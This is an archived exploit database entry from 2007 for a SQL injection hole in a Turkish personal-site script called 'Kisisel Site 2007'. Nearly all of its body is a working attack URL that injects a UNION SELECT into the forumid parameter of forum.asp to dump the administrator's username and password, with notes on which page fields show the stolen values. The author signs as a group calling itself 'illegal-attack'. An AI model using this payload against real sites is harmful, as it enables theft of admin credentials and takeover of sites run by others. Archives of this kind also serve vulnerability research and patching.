Kisisel Site 2007 - 'tr' SQL Injection

EDB-ID:

3278


Author:

cl24zy

Type:

webapps


Platform:

PHP

Date:

2007-02-06


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

###############################################################
#Ki.isel Site 2007 (tr) == SQL Injection Vulnerability
#Author : cl24zy
#Site : www.hacklive.org , www.illegal-attack.org
#Contact: admin@hacklive.org
###############################################################
#Download Ki.isel Site 2007 (tr) : http://www.aspindir.com/goster/4693
#Demo : http://www.gazilogo.com/personel/

#Exploit;
#Admin Nick, Passport;
http://[SITE]/forum.asp?sayfa=konular&forumid=-1%20union+all+select+0,kullaniciadi,2,3,sifre,5,6,7+from+admin

#Union data Text;
#Konu Ba.l.klar. : Admin UserName
#Yazan : Admin Password

# iLLeGaL-ATTaCK//TiM & HacKLivETeaM
################################################################

# milw0rm.com [2007-02-06]